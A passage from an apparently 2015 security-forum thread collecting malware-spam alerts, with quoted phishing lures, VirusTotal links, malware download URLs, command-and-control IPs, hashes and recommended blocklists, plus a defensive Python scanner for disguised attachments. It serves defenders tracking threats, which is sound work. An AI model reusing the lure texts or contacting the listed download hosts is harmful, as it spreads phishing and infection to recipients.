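    for probe in ("95.163.121.200", "85.143.216.102", "192.0.2.10"):
        print(probe, "blocked" if is_blocked(probe, merged) else "allowed")
```

Merging through ipaddress.collapse_addresses is what keeps the rule set honest as lists accumulate: a later single IP inside an earlier /24 disappears rather than producing a redundant rule, and a lookup against the merged list gives the same answer as a lookup against the originals.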
AplusWebMaster
2015-03-23, 17:40
FYI...
Fake 'Statement' SPAM – PDF malware
- http://myonlinesecurity.co.uk/retailer-statement-for-fake-pdf-malware/
23 Mar 2015 - "'Retailer Statement for 19745' (random numbers) pretending to come from user <tod@ awrco .com> with a zip attachment is another one from the current bot runs... The email which has random attachment numbers looks like:
HI,
document as an attachment
23 March 2015 : 587-19745-2563.zip: Extracts to: document.exe
Current Virus total detections: 3/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/617af029221f990c321ec39b4ff6e9bbe68651961ca4867882b9bfcfce18d2e0/analysis/1427123035/
... Behavioural information
TCP connections
91.198.22.70: https://www.virustotal.com/en/ip-address/91.198.22.70/information/
46.249.3.66: https://www.virustotal.com/en/ip-address/46.249.3.66/information/
217.19.14.37: https://www.virustotal.com/en/ip-address/217.19.14.37/information/
UDP communications
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
___
Fake 'approval' SPAM - PDF malware
- http://myonlinesecurity.co.uk/123111-approve-niemann-foods-laurie-liggett-fake-pdf-malware/
23 Mar 2015 - "'12/31(1/1) approve' pretending to come from Laurie Liggett <lliggett@ niemannfoods .com> with a zip attachment is another one from the current bot runs... The email looks like:
Your message is ready to be sent with the following file attachment.
Laurie Liggett
Buying Office Administrator
Niemann Foods,
Inc.
23 March 2015: 705-87633#5042.zip: Extracts to: pic.exe
Current Virus total detections: 1/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/45ff9d6bd81b85206bf349863573576f7953ae9617edc1bd699b61048c639308/analysis/1427128006/
... Behavioural information
TCP connections
91.198.22.70: https://www.virustotal.com/en/ip-address/91.198.22.70/information/
46.249.3.66: https://www.virustotal.com/en/ip-address/46.249.3.66/information/
94.126.48.158: https://www.virustotal.com/en/ip-address/94.126.48.158/information/
UDP communications
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
:fear: :mad:
AplusWebMaster
2015-03-24, 11:33
FYI...
Fake Resume SPAM - JavaScript malware
- http://myonlinesecurity.co.uk/resume-bobbie-rocha-fake-pdf-malware/
24 Mar 2015 - "'Resume Bobbie Rocha' pretending to come from Bobbie <BobbieRocha@ businesscommerce .com> with a zip attachment is another one from the current bot runs... The email looks like:
My name is Bobbie Rocha, attached is my resume.
I look forward to hearing back from you.
Thank you,
Bobbie
24 March 2015: Resume Bobbie Rocha.zip: Extracts to: Resume Bobbie Rocha.js
Current Virus total detections: 12/57* ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/d93d0d04c0eae52185bbf6c5a8b237950217447ef84fe3b8a76c230d1ef528b8/analysis/1427180393/
___
Fake Invoice SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/mary-watkins-ely-design-group-invoice-word-doc-or-excel-xls-spreadsheet-malware/
24 Mar 2015 - "'Mary Watkins Ely Design Group Invoice' pretending to come from Mary Watkins <mary@ elydesigngroup .co.uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Hi,
As promised!
Mary Watkins
Office Manager
Ely Design Group
25 February 2015 : S22C-6e15031710060.doc - Current Virus total detections: 2/55* | 2/55**
The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email..."
* https://www.virustotal.com/en/file/7ac6d989c14097f9edc5d8f46e0db43b24bacf91a6d24cbbd61832c0cbba3be8/analysis/1427186619/
** https://www.virustotal.com/en/file/2c8b21ea9739e9510e3ccc89523b6702397ab0ba48b755a067e61f7e1c96844e/analysis/1427186436/
- http://blog.dynamoo.com/2015/03/malware-spam-mary-watkins.html
24 Mar 2015 - "This spam email message does not come from Ely Design Group, but is in fact just a simple forgery. Ely Design Group's systems have not been compromised in any way. This email comes with a malicious attachment:
From: Mary Watkins [mary@ elydesigngroup .co.uk]
Date: 24 March 2015 at 07:23
Subject: Invoice
Hi,
As promised!
Mary Watkins
Office Manager
Ely Design Group
Attached is a Word document named S22C-6e15031710060.doc which has a low detection rate of 2/57* which contains this malicious macro which then downloads a component from the following location:
http ://dogordie .de/js/bin.exe
The file is saved as %TEMP%\PALmisc2.5.2.exe and has a VirusTotal detection rate of 6/57**.
Automated analysis tools... indicate that the binary crashes in those test environments, although whether or not it will work on a live PC is another matter. The payload (if it works) is almost definitely the Dridex banking trojan."
* https://www.virustotal.com/en/file/7ac6d989c14097f9edc5d8f46e0db43b24bacf91a6d24cbbd61832c0cbba3be8/analysis/1427189692/
** https://www.virustotal.com/en/file/6d528c55249ef53676bbea5296e337dc19ee8043ff27c77767f5ebfddc1ca209/analysis/1427189707/
... Behavioural information
UDP communications
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
dogordie .de: 81.169.145.156: https://www.virustotal.com/en/ip-address/81.169.145.156/information/
___
Fake 'Thank you' SPAM - PDF malware
- http://myonlinesecurity.co.uk/robinson-iga-project-thank-you-for-your-business-fake-pdf-malware/
24 Mar 2015 - "'Robinson IGA project Thank you for your business' pretending to come from user <elezaveta@ enewall .co.uk> with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Thank-you-for-your-business.png
24 March 2015 : 23807905.zip: Extracts to: doc.exe - Current Virus total detections: 2/56*
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/3ad17cba2f1cd98cb0030011d3559e86474d9527afa210b656e79ca97b9c1d90/analysis/1427194478/
... Behavioural information
TCP connections
134.249.63.46: https://www.virustotal.com/en/ip-address/134.249.63.46/information/
46.249.3.66: https://www.virustotal.com/en/ip-address/46.249.3.66/information/
___
Recent Malware Outbreaks
- http://www.senderbase.org/static/malware/
Last Updated: 2015/03/24 10:59 UTC
Top Malware Senders
- http://www.senderbase.org/static/malware/#tab=1
Last Updated: 2015/03/24 10:03 UTC
___
Fake 'Payment To Skype' - PayPal phish...
- http://myonlinesecurity.co.uk/new-payment-to-skype-inc-paypal-phishing/
24 Mar 2015 - "'New Payment To Skype INC' pretending to come from Pay Pal <lordjohn74@ hotmail .co.uk> is one of the latest phish attempts to steal your Paypal account and your Bank, credit card and personal details... don’t click-the-link in the email...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/New-Payment-to-Skype-Inc.png
... the link (takes you to) a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/AFRIKA_Paypal-login-1-1024x500.png
... the phishers try to validate your details to make sure that you are entering “genuine” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/AFRIKA_Paypal-login-2.png
... these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
___
The RATS are free...
- http://www.symantec.com/connect/fr/blogs/nanocore-another-rat-tries-make-it-out-gutter
23 Mar 2015 - "... Remote access Trojans, otherwise known as RATs, are nothing new and they frequently grab their fair share of security-related news headlines. Commonly used in both targeted and non-targeted attacks, and even on mobile devices, RATs are a popular tool among cybercriminals; whether for financial gain, espionage, or for something more creepy. Some RATs are more common than others, such as the infamous Blackshades (W32.Shadesrat), PlugX (Backdoor.Korplug), Poison Ivy (Backdoor.Darkmoon), or many others that have made a name for themselves in the cybercriminal underground. However, every once in a while a new RAT tries to emerge out of the unknown and “make it” just like its more common cousins... human nature’s love of cheap or, better yet, free stuff is helping this RAT in its efforts to hit the big time but potentially at a cost to the developer... RATs sold on underground forums can vary in price, ranging anywhere from US$25 to $250. In recent years the security community has seen plenty of new RATs come and go but where things always get dirty is when a cracked version of a RAT is leaked online for free. When this happens, usage of the RAT increases; cybercriminals are (arguably) human after all and love to get things for free... It seems that every time the author tries to develop and improve NanoCore, one of the customers invariably ends up -leaking- a copy of it for free. This surely has to be a major disincentive for the original developer but they seem to possess endless optimism and persist to create new versions with enhanced capabilities, maybe in the hope that eventually enough customers will pay...
Top ten countries affected by Trojan.Nancrat (Jan 2014 to March 2015):
> http://www.symantec.com/connect/sites/default/files/users/user-2935611/Figure3_1.png
... The RAT is being distributed through malicious emails... targeted emails are being sent to energy companies in Asia and the Middle East and the cybercriminals behind the attack are spoofing the email address of a legitimate oil company in South Korea. Attached to the email is a malicious RTF file that exploits the Microsoft Windows Common Controls ActiveX Control Remote Code Execution Vulnerability (CVE-2012-0158*) and drops Trojan.Nancrat... The cracked versions of NanoCore are now not only available on the dark web but also on the visible web. That means it’s not just the more experienced cybercriminals who can easily access this malware for free, but also script kiddies eager to start their cybercriminal careers. The more the NanoCore malware is used and is visible on the underground, the higher the chances that one day it may end up just as well-known as some of the notorious RATs that have come before it..."
* http://www.securityfocus.com/bid/52911/references
___
Google warns of OS-trusted but unauthorised digital certificates
Maintaining digital certificate security
- http://googleonlinesecurity.blogspot.co.uk/2015/03/maintaining-digital-certificate-security.html
March 23, 2015 - "... Chrome users do not need to take any action to be protected by the CRLSet updates. We have no indication of abuse and we are not suggesting that people change passwords or take other action. At this time we are considering what further actions are appropriate..."
Firefox 37 ...
Revoking Trust in one CNNIC Intermediate Certificate
- https://blog.mozilla.org/security/2015/03/23/revoking-trust-in-one-cnnic-intermediate-certificate/
Mar 23, 2015 - "... to protect our users we are adding the revoked certificate to OneCRL, our mechanism for directly sending revocation information to Firefox which will be shipping in Firefox 37..."
- https://wiki.mozilla.org/Releases#Upcoming_Releases
"... Firefox 37... RELEASE week of March 31, 2015."
:fear::fear: :mad:
AplusWebMaster
2015-03-25, 15:28
FYI...
Fake 'Payment' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/payment-1142-word-doc-or-excel-xls-spreadsheet-malware/
25 Mar 2015 - "'Payment 1142' pretending to come from James Dudley <James.Dudley@ hitec .co.uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Payment sheet attached.
James
T 01353 624023
F 01353 624043
E james.dudley@ hitec .co.uk
Hitec Ltd
23 Regal Drive
Soham
Ely
Cambs
CB7 5BE
This message has been scanned for viruses and malicious content by Green Duck SpamLab
25 February 2015 : Payment 1142.doc - Current Virus total detections: 2/56*
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/b4470a74c07438336eee8450a839410971570aeb57334d19e7053a31c459d3a2/analysis/1427270267/
- http://blog.dynamoo.com/2015/03/malware-spam-james-dudley.html
25 Mar 2015 - "This spam email is yet another forgery pretending to be from a wholly legitimate company. It is one of a series of emails spoofing Cambridgeshire firms, and it comes with a malicious attachment.
From: James Dudley [James.Dudley@ hitec .co.uk]
Date: 25 March 2015 at 09:38
Subject: Payment 1142
Payment sheet attached.
James
T 01353 624023
F 01353 624043
Hitec Ltd
23 Regal Drive
Soham
Ely
Cambs
CB7 5BE
This message has been scanned for viruses and malicious content by Green Duck SpamLab
I have only seen a single sample of this, with an attachment Payment 1142.doc which has a VirusTotal detection rate of 5/57*. It contains this malicious macro... which attempts to download a component from:
http ://madasi.homepage .t-online .de/dbcfg/32.exe
..which is then saved as %TEMP%\sollken1.2.8.exe, this has a detection rate of 12/57**. Automated analysis of this binary is pending, but is so far inconclusive...
MD5s:
8f79a24970d9e7063ffcedc9a8d23429
02cfa3e6fdb4301528e5152de76b2abf
UPDATE: this interesting new tool from Payload Security[1] gives some insight as to what the malware does. In particular, it phones home to:
50.31.1.21 (Steadfast Networks, US)
87.236.215.103 (OneGbits, Lithuania)
2.6.14.246 (Orange S.A., France)
14.96.207.127 (Tata Indicom, India)
95.163.121.178 (Digital Networks aka DINETHOSTING, Russia)
Recommended blocklist:
50.31.1.21
87.236.215.103
2.6.14.246
14.96.207.127
95.163.121.0/24 "
* https://www.virustotal.com/en/file/4ad0b509b232dc0fc1704552de614849f1ddc63dbd5c9f3cf9fc2490c6abcba8/analysis/1427293393/
** https://www.virustotal.com/en/file/7bcb0abcfbea20ecfe31d8dd65146b8b1ffd0d81479d11dc329b2f99e263bd78/analysis/1427293399/
1] https://www.hybrid-analysis.com/sample/7bcb0abcfbea20ecfe31d8dd65146b8b1ffd0d81479d11dc329b2f99e263bd78?environmentId=1
___
Fake Citi SPAM - PDF malware
- http://myonlinesecurity.co.uk/citi-merchant-services-statements-fake-pdf-malware/
25 Mar 2015 - "'Citi Merchant Services statements – 05721901-6080' ( random numbers) pretending to come from user <noreply@ efsnb-archive .com> with a zip attachment is another one from the current bot runs... The email looks like:
Attached is your Merchant Statement. It is secured so that only an
authorized recipient can open it. To open, click on the attachment.
In order to view
the attached PDF file, you need Adobe Acrobat Reader Version 8.0
installed.
Click on the following link:
<http ://www.adobe .com/products/acrobat/readstep2.html> to complete a free
install or re-install if you have an older version.
Visit Microsoft’s self
help website at www .microsoft .com or contact your ISP if you do not
receive the attachment.
Delivering your statements directly to your desktop is just one
more way we’ve increased the speed of business. Thanks again for
choosing CTS Holdings, LLC as your merchant processor. CTS Holdings, LLC, you can
count on us!
This is a post-only mailing. Please do not respond. To change
preferences please contact Customer Service at 1-800-238-7675.
25 March 2015 : random zip name : Extracts to: Merchant.exe - Current Virus total detections: 6/57*
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/a003f8cedb6b5657883347626c9274bbbb5425ab46054045279c92edb44da240/analysis/1427293896/
... Behavioural information
TCP connections
91.198.22.70: https://www.virustotal.com/en/ip-address/91.198.22.70/information/
46.249.3.66: https://www.virustotal.com/en/ip-address/46.249.3.66/information/
134.249.63.46: https://www.virustotal.com/en/ip-address/134.249.63.46/information/
- http://threattrack.tumblr.com/post/114585529008/citibank-spam
Mar 25, 2015
Malicious File Name and MD5:
Merchant.exe (4007601E07343ADD409490F572F97D46)
Tagged: Citibank, Upatre
___
Fake 'Invoice ID' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/03/malware-spam-invoice-id12ab34-123.html
25 Mar 2015 - "This terse spam has a malicious attachment:
From: Gerry Carpenter
Date: 25 March 2015 at 12:58
Subject: Invoice ID:34bf33
123
There is an Excel attachment with the same semi-random reference number as the subject (in the sample I saw it was 34bf33.xls) which currently has -zero- detections*. Unlike most recent document-based attacks, this does -not- contain a macro, but instead has an embedded OLE object that will run a VBscript if clicked; the spreadsheet itself is designed to get the victim to click-and-run that object.
> https://1.bp.blogspot.com/-erquBHy1ODg/VRLbYnI3WiI/AAAAAAAAGaM/o0CKQcJVoyk/s1600/excel-ole.png
Automated analysis doesn't show very much, but it does show the screenshots [1] [2]... the downloaded file is actually an EXE file all along so nothing is done to it. This file has a detection rate of 7/56**, and the Payload Security report shows it communicating with the following IPs:
92.63.88.83 (MWTV, Latvia)
82.151.131.129 (DorukNet, Turkey)
121.50.43.175 (Tsukaeru.net, Japan)
The payload is most likely Dridex.
Recommended blocklist:
92.63.88.0/24
82.151.131.129
121.50.43.175
MD5s:
ce130212d67070459bb519d67c06a291
461689d449c7b5a905c8404d3a464088 "
* https://www.virustotal.com/en/file/a233724a85833599b75ff4beab42f7ce30cb076572629ee487a7813148c9f729/analysis/1427298940/
** https://www.virustotal.com/en/file/f2328ad463d584ba06cba3338d73b1ee2ba772401d51cf0c88c51aec53bd3623/analysis/1427296948/
1] https://www.hybrid-analysis.com/sample/a233724a85833599b75ff4beab42f7ce30cb076572629ee487a7813148c9f729?environmentId=1
2] https://malwr.com/analysis/NTI5ODY2ZTdiZGIzNDllODg2ZmI4ZTQwNDcxMDBkZjc/
___
Fake 'ACH failure' SPAM - PDF malware
- http://myonlinesecurity.co.uk/ach-technical-failure-fake-pdf-malware/
25 Mar 2015 - "'ACH technical failure' pretending to come from The Electronic Payments Association <June.Parks@ nacha .org> [random names at nacha .org] with a link to a zip attachment is another one from the current bot runs... Other subjects in this series of spam malicious emails on the nacha theme are:
Transaction system failure
ACH transfer error
ACH technical failure
Your transfer failed due to technical failure ...
The email looks like:
ACH PAYMENT REJECTED
The ACH Payment (ID: 53213740992857), recently sent from your savings account (by you or any other person), was REJECTED by other financial institution.
Rejection Reason: See details in the report below
Payment Report: report_53213740992857.pdf (Adobe Reader PDF)
13450 Sunrise Valley Drive, Suite 100
Herndon, VA 20171
2014 NACHA – The Electronic Payments Association
The link once again goes to a cubby user content site...
25 March 2015: Secure_Message.zip: Extracts to: Secure_Message.exe
Current Virus total detections: 11/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/6bab36b28de36ffd08af154433a8a6204919dd71d72dffc8975d8775328aec99/analysis/1427301251/
... Behavioural information
TCP connections
216.146.38.70: https://www.virustotal.com/en/ip-address/216.146.38.70/information/
46.249.3.66: https://www.virustotal.com/en/ip-address/46.249.3.66/information/
134.249.63.46: https://www.virustotal.com/en/ip-address/134.249.63.46/information/
___
Fake DHL SPAM - malware
- http://myonlinesecurity.co.uk/dhl-awb-34-5673-0015-shipment-malware/
25 Mar 2015 - "'DHL AWB# 34 5673 0015 / shipment' pretending to come from DHL Express <info@ dhl .com> with a zip attachment is another one from the current bot runs... The email looks like:
Dear customer,
The following 1 piece(s) have been sent by a Customer via DHL Express on 22-03-2015 via AWB# 34 5673 0015
Find attached Scanned copy of the shipping documents and more information about the parcel and confirm if the address is correct for shipment.
Thank you.
25 March 2015: DOCUMENTS.zip: Extracts to: DOCUMENTS.exe - Current Virus total detections: 7/56*
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/11c549bf477589051ea2dc00058bbec761b21df16b4ece52255f6b567ca72233/analysis/1427286243/
... Behavioural information
TCP connections
66.171.248.172: https://www.virustotal.com/en/ip-address/66.171.248.172/information/
UDP communications
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
___
Fake 'Notice to appear in Court' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/03/malware-spam-notice-to-appear-notice-to.html
24 Mar 2015 - "These two emails come with a malicious attachment:
From: County Court [lester.hicks@ whw0095 .whservidor .com]
Date: 24 March 2015 at 16:45
Subject: AERO, Notice to Appear
This is to inform you to appear in the Court on the March 31 for your case hearing.
Please, prepare all the documents relating to the case and bring them to Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.
You can review complete details of the Court Notice in the attachment.
Yours faithfully,
Lester Hicks,
Court Secretary.
-------------
From: District Court [cody.bowman@ p3nw8sh177 .shr.prod.phx3 .secureserver .net]
Date: 24 March 2015 at 16:44
Subject: AERO, Notice to appear in Court #0000310657
Dear Aero,
This is to inform you to appear in the Court on the March 28 for your case hearing.
You are kindly asked to prepare and bring the documents relating to the case to Court on the specified date.
Note: If you do not come, the case will be heard in your absence.
You can review complete details of the Court Notice in the attachment.
Sincerely,
Cody Bowman,
District Clerk.
In these two cases the attachments were named Court_Notification_0000310657.zip and Notice_to_Appear_000283436.zip containing the malicious scripts Court_Notification_0000310657.doc.js [VirusTotal 7/57*]... and Notice_to_Appear_000283436.doc.js [VirusTotal 6/57**]... respectively. These scripts attempt to download malicious code... Details in the download locations vary, but are in the format:
ilarf .net/document.php?rnd=1161&id=
gurutravel .co .nz/document.php?rnd=3022&id=
This leads to a randomly-named file with a GIF extension which is actually one of two malicious EXE files, with detection rates of 6/57*** and 4/56****. One of those produces a valid Malwr report, the other smaller EXE doesn't seem to do anything. The executable that seems to do something POSTs to a Turkish server at 176.53.125.25 (Radore Veri Merkezi Hizmetleri A.S.). Various Malwr reports... indicate badness on at least the following IPs:
176.53.125.20
176.53.125.21
176.53.125.22
176.53.125.23
176.53.125.24
176.53.125.25
I would suggest blocking at least those IPs, or perhaps 176.53.125.16/28 or if you don't mind blocking access to a few legitimate Turkish sites you could perhaps block 176.53.125.16/24. I am not 100% certain of the payload, however some servers in that cluster have been fingered for serving the Trapwot fake anti-virus[5] software.
MD5s:
2d65371ac458c7d11090aca73566e3d4
da63f87243a971edca7ecd214e6fdeb1
77d8670f80c3c1de81fb2a1bf05a84b5
d48ef4bb0549a67083017169169ef3ee "
* https://www.virustotal.com/en/file/223ba74071922b52dcc71fbcd7b937c457dca1f774e4b2aaf3d1dbc220bf6f31/analysis/1427221635/
** https://www.virustotal.com/en/file/d5154ca08fe4ae6295285c410fdc25992c337b37e785c6f764f931a1b3b3d8b1/analysis/1427221612/
*** https://www.virustotal.com/en/file/b4075e73abb294254dc38465f956a39ceb7dcc31c263a7ee54b0e4d820184746/analysis/1427222714/
**** https://www.virustotal.com/en/file/daf4d96a121c9e4935082d4e0264088ff352f14d868f8720d8fa7e4f99c82f05/analysis/1427223237/
5] http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Rogue:Win32/Trapwot
:fear::fear: :mad:
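A defender-side check for the attachment patterns described in the posts above (a zip that "extracts to" an .exe or .scr wearing a PDF icon, and a .doc.js double extension), added here as an example; it is not code from any of the quoted blogs. It inspects archive member names and the first bytes of each member; the sample archives are constructed in memory and only borrow attachment names quoted in this thread.

```python
"""Scan e-mail attachment archives for executables disguised as documents.

Constructed example for this thread (not from any quoted blog). The rules
mirror the lures described above: Windows hides "known" extensions, so
"Invoice.pdf.exe" shows as "Invoice.pdf", and a .doc.js script looks like a
Word file. Every archive below is a dummy built in memory.
"""
import io
import os
import zipfile

# Extensions Windows runs on double-click and hides behind a lure icon.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd",
                   ".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta"}
# Extensions the lure pretends to be.
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".rtf", ".txt"}

MZ_MAGIC = b"MZ"     # first two bytes of every Windows EXE/SCR/DLL
PDF_MAGIC = b"%PDF"  # first four bytes of a genuine PDF


def split_all_exts(name):
    """Return every extension of a member name, lowercased, in order:
    'Notice_to_Appear_000283436.doc.js' -> ['.doc', '.js']."""
    base = os.path.basename(name)
    exts = []
    while True:
        base, ext = os.path.splitext(base)
        if not ext:
            return exts
        exts.insert(0, ext.lower())


def classify_member(name, head):
    """Return the list of reasons a member looks like a disguised executable
    (empty list means no rule fired). `head` is the member's first bytes."""
    reasons = []
    exts = split_all_exts(name)
    last = exts[-1] if exts else ""
    if last in EXECUTABLE_EXTS:
        reasons.append("executable extension %s" % last)
    if len(exts) >= 2 and exts[-2] in DOCUMENT_EXTS and last in EXECUTABLE_EXTS:
        reasons.append("double extension %s%s" % (exts[-2], last))
    if head.startswith(MZ_MAGIC) and last not in EXECUTABLE_EXTS:
        # A PE file renamed to a document extension is caught by content.
        reasons.append("PE header but non-executable extension %s" % (last or "(none)"))
    if last == ".pdf" and head[:4] and not head.startswith(PDF_MAGIC):
        reasons.append("claims .pdf but lacks %PDF magic")
    return reasons


def scan_zip(data):
    """Scan a zip archive held in memory; return {member: [reasons]} for hits."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(4)  # magic bytes are enough; never execute it
            reasons = classify_member(info.filename, head)
            if reasons:
                findings[info.filename] = reasons
    return findings


def make_zip(members):
    """Build a zip in memory from {name: bytes} (fixture builder only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed fixtures: names modelled on attachments quoted in the posts,
# contents are dummies (an MZ header for the fakes, %PDF for a real PDF).
SAMPLE_ARCHIVES = {
    "DOCUMENTS.zip": make_zip({"DOCUMENTS.exe": b"MZ" + b"\x00" * 62}),
    "Court_Notification_0000310657.zip": make_zip(
        {"Court_Notification_0000310657.doc.js": b"var x = 1;"}),
    "Payment Confirmation pdf.zip": make_zip(
        {"Payment Confirmation pdf.exe": b"MZ" + b"\x00" * 62}),
    "renamed.zip": make_zip({"statement.pdf": b"MZ" + b"\x00" * 62}),
    "clean.zip": make_zip({"statement.pdf": b"%PDF-1.4\n", "notes.txt": b"hi"}),
}


def scan_all(archives=SAMPLE_ARCHIVES):
    """Scan every archive; return {archive: {member: [reasons]}} for hits only."""
    report = {}
    for archive, data in archives.items():
        hits = scan_zip(data)
        if hits:
            report[archive] = hits
    return report


if __name__ == "__main__":
    for archive, hits in scan_all().items():
        for member, reasons in hits.items():
            print("%s -> %s: %s" % (archive, member, "; ".join(reasons)))
```

Note that "Payment Confirmation pdf.exe" is flagged only for its .exe extension: the word "pdf" before a space is not an extension, which is exactly why the lure relies on the icon rather than the name.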
AplusWebMaster
2015-03-26, 16:15
FYI...
Fake 'scanned' results SPAM - PDF malware
- http://myonlinesecurity.co.uk/lou-ann-davis-indus-precision-mfg-scanned-fake-pdf-malware/
26 Mar 2015 - "'Lou Ann Davis Indus Precision Mfg scanned' pretending to come from user <louann@ indusmfg .com> with a zip attachment is another one from the current bot runs... The email looks like:
–
Thank you,
Lou Ann Davis
Office Administrator
Indus Precision Mfg., Inc.
www .indusmfg .com
Main: (845)268-0782
Fax: (845)268-2106
26 March 2015 : Random zip name : Extracts to: scan.exe
Current Virus total detections: 3/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/a2d5c1886f4eff6177b2f4ead85c92cb8d6b7c7a11845b9b9a279793008a3c89/analysis/1427372574/
___
Fake 'Invoice' SPAM - PDF malware
- http://myonlinesecurity.co.uk/yarde-metals-invoice-fake-pdf-malware/
26 Mar 2015 - "'Yarde Metals Invoice' pretending to come from email.invoice <email.invoice@ yarde .com> with a zip attachment is another one from the current bot runs... The email looks like:
Thank you for your order.
Attached is your original invoice. If you would
like to pay for
your order with a wire transfer please contact Angela Palmer
at 860-406-6311 for bank details.
Friendly reminder:
Yarde Metals terms
are 1/2% 10, Net 30. We appreciate your prompt payment.
26 March 2015: random zip name: Extracts to: 221324.exe
Current Virus total detections: 3/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4802ac489a2fca2e86f42a6e74169f9f687ad262cb4629d7e2cf84cb0710f5a5/analysis/1427380401/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
46.249.3.66: https://www.virustotal.com/en/ip-address/46.249.3.66/information/
46.160.125.167: https://www.virustotal.com/en/ip-address/46.160.125.167/information/
91.194.239.126: https://www.virustotal.com/en/ip-address/91.194.239.126/information/
93.123.40.17: https://www.virustotal.com/en/ip-address/93.123.40.17/information/
UDP communications
104.41.150.68: https://www.virustotal.com/en/ip-address/104.41.150.68/information/
___
BoA 'Over Limit' Spam
- http://threattrack.tumblr.com/post/114674089173/bank-of-america-over-limit-spam
Mar 26, 2015 - "Subjects Seen
Activity Alert: A Check Exceeded Your Requested Alert Limit
Typical e-mail details:
A check exceeded your requested alert limit
We’re letting you know a check written from your account went over the limit you set for this alert.
For more details please check attached file
Malicious File Name and MD5:
report_77076291400.scr (6B6E3D3FDE233FE75F64B517F2351D97)
___
Steam Codes and Countdowns - 'something for nothing'
- https://blog.malwarebytes.org/privacy-2/2015/03/steam-codes-and-countdowns/
March 26, 2015 - "... 'something for nothing' makes a reappearance in the land of -gaming- with a twist designed to get would-be winners sending messages to their online friends as fast as they possibly can. The site we’re going to examine is located at: steamcode(dot)org
... which claims they have $20 Steam Codes to give away, as the “We’re the people who give away free $20 Steam Codes!” makes clear on the frontpage. We could have an interesting philosophical debate about when free means free, but we could also just chalk it up as “free, as long as you send some links and fill in a bunch of stuff”. Here’s the nicely designed frontpage:
> https://blog.malwarebytes.org/wp-content/uploads/2015/03/stmcd1.jpg
Clicking the button reveals two things – a tantalizing glimpse of half a code, and the reveal that you must share a link with 15 people in 45 minutes or else the code will expire. If you don’t have Under Pressure on your playlist, you might want to go dig it out now:
> https://blog.malwarebytes.org/wp-content/uploads/2015/03/stmcd2.jpg
Sites don’t normally place a timer on link sending, because not many people immediately whip out a list of likely candidates to start spamming when confronted with a rapidly diminishing timer. Indeed, start quickfiring identikit messages to all and sundry and you may find more than a few of them either think you’ve been hacked or turned into a spambot for the day. Should the required amount of referrals be reached, the end result is a selection of survey pages for the would-be $20 code recipient... There’s -no- guarantee the full code will be released even with a completed survey – the only person who has anything to lose in this situation is the individual filling in whatever forms are presented, working on the basis that they’re simply hoping the website will hand over a code at the end of the process. Freebie sites offering up items such as vouchers, gift cards and game codes typically resort to surveys at some point in the chain – it’s just how they roll. Displaying a portion of the code and adding in a time sensitive instruction to send URLs to all and sundry focuses on the “So near, yet so far” pressure point, and is a great way to ensure people desperate for free game codes start yelling “How high?” before jumping."
:fear: :mad:
AplusWebMaster
2015-03-27, 12:58
FYI...
Fake ebill Invoice SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/uk-fuels-ebill-for-iso-week-201512-word-doc-or-excel-xls-spreadsheet-malware/
